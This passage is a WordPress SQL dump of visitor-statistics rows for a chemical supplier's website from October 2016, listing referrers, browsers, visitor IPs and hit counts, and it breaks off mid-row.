INSERT INTO `wp_statistics_visitor` VALUES (1850, '2016-10-08', 'https://www.miller-stephenson.com/product/epon-830/', 'MSIE', 'Windows', '9.0', '', '204.79.180.45', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1851, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '39.0', '', '68.43.149.234', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1852, '2016-10-08', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '3.5.0', '', '195.154.233.177', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1853, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.130.239.123', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1854, '2016-10-08', 'https://www.google.com', 'Firefox', 'Windows', '29.0', '', '54.149.199.132', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1855, '2016-10-08', 'https://www.google.co.uk/', 'Safari', 'Macintosh', '10.0', '', '95.145.146.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1856, '2016-10-08', 'https://www.miller-stephenson.com/vertrel-fluids/', 'Safari', 'iPhone', '7.0', '', '199.30.17.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1857, '2016-10-08', 'https://translate.googleusercontent.com/translate_p?hl=fr&prev=search&sl=en&u=https://www.miller-stephenson.com/miller/release_agents.html&depth=1&rurl=translate.google.fr&usg=ALkJrhgAAAAAV_lx2TyvQcCldtJuVucki188XztVLydm', 'Chrome', 'Windows', '53.0.2785.143', '', '78.201.87.46', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1858, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.122', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1859, '2016-10-08', 'https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent', 'MSIE', 'Windows', '9.0', '', '182.118.20.173', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1860, '2016-10-08', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.210', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1861, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '204.14.86.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1862, '2016-10-08', 'https://www.miller-stephenson.com', 'Firefox', 'Linux', '20.0', '', '204.14.86.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1863, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.148', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1864, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/', 'Firefox', 'Windows', '44.0', '', '46.119.120.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1865, '2016-10-08', 'https://www.google.ca/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '128.189.85.87', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1866, '2016-10-08', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '74.71.147.36', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1867, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '73.182.186.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1868, '2016-10-08', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.99.155.167', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1869, '2016-10-08', 'https://r.search.yahoo.com/_ylt=AwrBT9cFfvlXPuMAyuvBGOd_;_ylu=X3oDMTBzdWd2cWI5BGNvbG8DYmYxBHBvcwMxMAR2dGlkAwRzZWMDc3I-/RV=2/RE=1475997318/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=0fsizxsGqWTiL915ZfboqEGba4s-', 'Safari', 'iPad', '9.0', '', '66.30.222.141', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1870, '2016-10-08', 'https://www.google.com/afs/ads?q=good%20strucual%20epoxy%20adhesive&oe=utf-8&lo=true&adpage=1&adrep=5&r=m&fexp=21404&client=aol-rr&channel=enhancedsearch_new_csa&adtest=off&adsafe=low&type=0&ie=UTF-8&format=p4%7Cn5&ad=n5p4&nocache=8691475969327682&num=0&output=uds_ads_only&v=3&adlh=on&adext=as1%2Cl1%2Csr1&bsl=8&u_his=2&u_tz=-240&dt=1475969327683&u_w=1600&u_h=900&biw=1600&bih=750&psw=1600&psh=750&frm=0&uio=uv3cs1sr1lo1va1as1sl1-lHst15sd14sv14sa14-lhst15sd14sv14sa14&jsv=91621&rurl=https%3A%2F%2Fsearch.twcc.com%2F%23web%2Fgood%2520strucual%2520epoxy%2520adhesive%2F1%2F&referer=https%3A%2F%2Fwww.twcc.com%2F', 'Edge', 'Windows', '14.14393', '', '24.198.200.122', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1871, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '81.169.201.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1872, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/https:%5C/%5C/www.miller-stephenson.com%5C/product%5C/krytox-ts4-thread-sealant%5C/', 'Chrome', 'Windows', '48.0.2564.103', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1873, '2016-10-08', 'https://www.miller-stephenson.com/product/krytox-ts4-thread-sealant/https:%5C/%5C/miller-stephenson.com%5C/product%5C/krytox-ts4-thread-sealant%5C/', 'Chrome', 'Windows', '48.0.2564.97', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1874, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '188.165.118.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1875, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.148.234.7', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1876, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '91.213.108.72', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1877, '2016-10-08', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '158.69.237.99', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1878, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.122', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1879, '2016-10-09', 'https://www.google.com/', 'Safari', 'iPad', '10.0', '', '76.205.174.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1880, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '5.54.255.188', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1881, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '46.234.230.192', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1882, '2016-10-09', 'https://vremya.eu/stati/zdorove-i-medicina/kosmetologicheskii-centr-yeterija-odessa.html', 'Unknown', 'Unknown', 'Unknown', '', '37.115.187.108', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1883, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 46, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1884, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '41.71.178.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1885, '2016-10-09', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '107.3.95.149', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1886, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '137.229.78.10', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1887, '2016-10-09', 'https://www.google.com', 'Firefox', 'Windows', '33.0', '', '54.87.132.159', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1888, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.19', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1889, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1890, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.116', '', '47.221.147.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1891, '2016-10-09', 'https://www.miller-stephenson.com/product/heloxy-48/', 'Safari', 'iPhone', '7.0', '', '157.55.2.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1892, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '68.1.61.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1893, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '24.166.83.98', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1894, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '107.3.75.239', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1895, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '73.233.249.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1896, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '108.233.177.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1897, '2016-10-09', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1898, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '73.218.109.252', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1899, '2016-10-09', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0CEEQFjAF&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Fkrytox-lubricants%2F&ei=o5r5V9K2FMq1nQaCUw&usg=AFQjCNFJMcZt6xCpXzcHAOYSpI7Q31y8hg', 'Safari', 'iPhone', '9.0', '', '66.249.88.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1900, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/krytox-lubricants/', 'Safari', 'iPhone', '9.0', '', '66.249.88.156', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1901, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.60.247.147', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1902, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '66.102.6.121', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1903, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1904, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1905, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1906, '2016-10-09', 'https://www.bing.com/search?q=amazon', 'MSIE', 'Windows', '11.0', '', '109.156.204.227', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1907, '2016-10-09', 'https://www.miller-stephenson.com', 'AppleWebKit', 'Macintosh', '602.1.50', '', '75.83.3.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1908, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '24.71.18.216', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1909, '2016-10-09', 'https://www.miller-stephenson.com/miller/resin.html', 'MSIE', 'Windows', '9.0', '', '182.118.21.219', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1910, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1911, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.87.142.110', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1912, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.53.216.181', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1913, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '62.210.148.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1914, '2016-10-09', 'https://www.miller-stephenson.com/products/connector_lubricants.aspx', 'MSIE', 'Windows', '9.0', '', '182.118.20.217', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1915, '2016-10-09', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '107.147.45.65', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1916, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Unknown', '44.0', '', '81.187.169.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1917, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1918, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.244.82.83', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1919, '2016-10-09', 'https://www.miller-stephenson.com/product/ms-143te/', 'Safari', 'iPhone', '7.0', '', '131.253.27.124', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1920, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.211', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1921, '2016-10-09', 'https://www.google.com/aclk?sa=L&ai=DChcSEwi777D33czPAhVHZIYKHfbqDvIYABAA&ei=OLP5V8WFCMSp-QG56rbwDw&sig=AOD64_1AcvbV9hdDW57B-UoX4atOB65XZA&rct=j&q=&sqi=2&ved=0ahUKEwjFga333czPAhXEVD4KHTm1Df4Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '108.206.93.103', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1922, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '60.179.100.142', '000', 30, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1923, '2016-10-09', 'https://www.bing.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '210.75.252.213', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1924, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.0.3', '', '40.131.113.130', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1925, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '98.209.19.50', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1926, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '104.197.99.184', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1927, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.168.40', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1928, '2016-10-09', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.116', '', '68.148.16.30', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1929, '2016-10-09', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '108.225.191.78', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1930, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.141.230.237', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1931, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '104.197.66.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1932, '2016-10-09', 'https://www.miller-stephenson.com/contact_re-nu/', 'Chrome', 'Windows', '39.0.2171.71', '', '46.246.43.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1933, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '72.222.249.211', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1934, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '141.189.251.16', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1935, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1936, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.168', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1937, '2016-10-09', 'https://almata.xkaz.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1938, '2016-10-09', 'https://www.google.com', 'Firefox', 'Windows', '36.0', '', '54.234.122.176', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1939, '2016-10-09', 'https://www.photorepair.ru/', 'MSIE', 'Windows', '5.5', '', '46.118.155.22', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1940, '2016-10-09', 'https://www.google.co.uk/', 'Chrome', 'Android', '53.0.2785.124', '', '5.160.152.183', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1941, '2016-10-09', 'https://mmr.mschem.com/miller/pdf/MS-122AD.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '183.128.33.109', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1942, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '113.118.244.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1943, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '113.118.247.29', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1944, '2016-10-09', 'https://www.miller-stephenson.com/product/ms-143xd/', 'Firefox', 'Windows', '43.0', '', '199.168.97.28', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1945, '2016-10-09', 'https://www.miller-stephenson.com/product/ms-143xd/', 'Chrome', 'Windows', '48.0.2564.109', '', '199.168.97.28', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1946, '2016-10-09', 'https://www.miller-stephenson.com/product/ms-143xd/', 'Chrome', 'Windows', '48.0.2564.103', '', '199.168.97.28', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1947, '2016-10-09', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '76.91.23.86', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1948, '2016-10-09', 'https://www.google.com.tw/', 'Chrome', 'Windows', '53.0.2785.143', '', '60.250.184.24', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1949, '2016-10-09', 'https://www.baidu.com/link?url=cld4a6_IlE1JLSD9-lvQ1SFd-ZxiO4SewiyN5xsaEuGE20j7-j1jsQl6b0T1QlM2&wd=&eqid=fd105b07000001150000000457f9e15a', 'Chrome', 'Windows', '45.0.2454.101', '', '116.226.148.221', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1950, '2016-10-09', 'https://www.google.com/', 'Chrome', 'Windows', '52.0.2743.116', '', '67.161.25.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1951, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.184', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1952, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.157', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1953, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.60.181', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1954, '2016-10-09', 'https://www.miller-stephenson.com', 'Wget', 'Unknown', '1.17.1', '', '174.127.135.61', '000', 16, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1955, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.164.102.254', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1956, '2016-10-09', 'https://www.miller-stephenson.com/dupont-krytox-fluorinated-lubricants/', 'Chrome', 'Windows', '21.0.1180.89', '', '101.226.167.248', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1957, '2016-10-09', 'https://www.miller-stephenson.com/product/157-fsl/', 'MSIE', 'Windows', '11.0', '', '130.234.108.12', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1958, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '14.0.835.186', '', '104.223.17.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1959, '2016-10-09', 'https://www.uroki.net/', 'MSIE', 'Windows', '6.0', '', '46.118.155.22', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1960, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '104.132.58.81', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1961, '2016-10-09', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0CDEQFjAF&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fsolvents%2Fvertrel%2F&ei=Evz5V_DjGL_BnwHEfQ&usg=AFQjCNHb06o1qEUMWWwyPw2EGjHda1K7WQ', 'MSIE', 'Windows', '11.0', '', '66.249.88.25', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1962, '2016-10-09', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'MSIE', 'Windows', '11.0', '', '66.249.88.23', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1963, '2016-10-09', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.205.45.201', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1964, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1965, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.50.163', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1966, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '180.151.233.10', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1967, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '93.138.104.35', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1968, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1969, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '42.0.2311.152', '', '157.56.3.66', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1970, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.44', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1971, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1972, '2016-10-09', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.6.3', '', '115.200.220.168', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1973, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '26.0.1410.64', '', '54.210.38.44', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1974, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '194.187.170.121', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1975, '2016-10-09', 'https://www.google.com.sg/', 'Firefox', 'Windows', '49.0', '', '132.147.110.162', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1976, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '45.40.253.160', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1977, '2016-10-09', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '48.0.2564.97', '', '109.86.72.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1978, '2016-10-09', 'https://www.miller-stephenson.com/', 'Firefox', 'Windows', '44.0', '', '109.86.72.191', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1979, '2016-10-09', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '112.65.201.60', '000', 40, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1980, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '19.0.1047.0', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1981, '2016-10-09', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '117.62.28.91', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1982, '2016-10-09', 'https://www.miller-stephenson.com/miller/support.html', 'AppleWebKit', 'Windows', '534', '', '131.253.25.152', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1983, '2016-10-09', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '11.0.696.3', '', '5.39.85.81', '000', 223, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1984, '2016-10-09', 'https://www.google.ro/', 'Chrome', 'Windows', '53.0.2785.143', '', '81.12.211.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (1985, '2016-10-09', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1204.n7TGuNPw3N0Zt9YDgrU4FlzpQLmvq22fOuctnRktsqSSujz8frSKTklKEaOyiGrV.02a92498702d16fa4a4439e381ea088977cf8da4&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YLeQVNu7TCjFWhspMNrg36Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXdBQ1E3VkJaMGdpRUotb0JwdlYxNDRaT2xrMko5MkJOSndIY1lNWnhLbndsN2g5WTRrZXlVNDlaR2ZJUXo4VkEzczh3WnRrQ1F1TW1yX2l2QnRhTGRibXV6Uld6NHYzQQ&b64e=2&sign=7e0aa3e469180fbf89d9cdfbdcad2eb5&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQYP93Xfrtkbawf9Z3A2geaJmpeafcz8KemQ2jVSnWRmqbXRoK990QD2pIOo1a3Hgn5s1jA3yDpReZ_ag_giWDwSJHV5Ax9e4kX01ZYo2vmsloxtn2J61WEMkbHOdsWTHEw&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVLVIUOk4qiELgsqQWlG-ttze1BilwTSZY9w5SAEenZ1x7KwxaTxOYnkZ_QwtyDI8s7aSv-1PcCxXZGn4HQIc7mgnmZwJSrt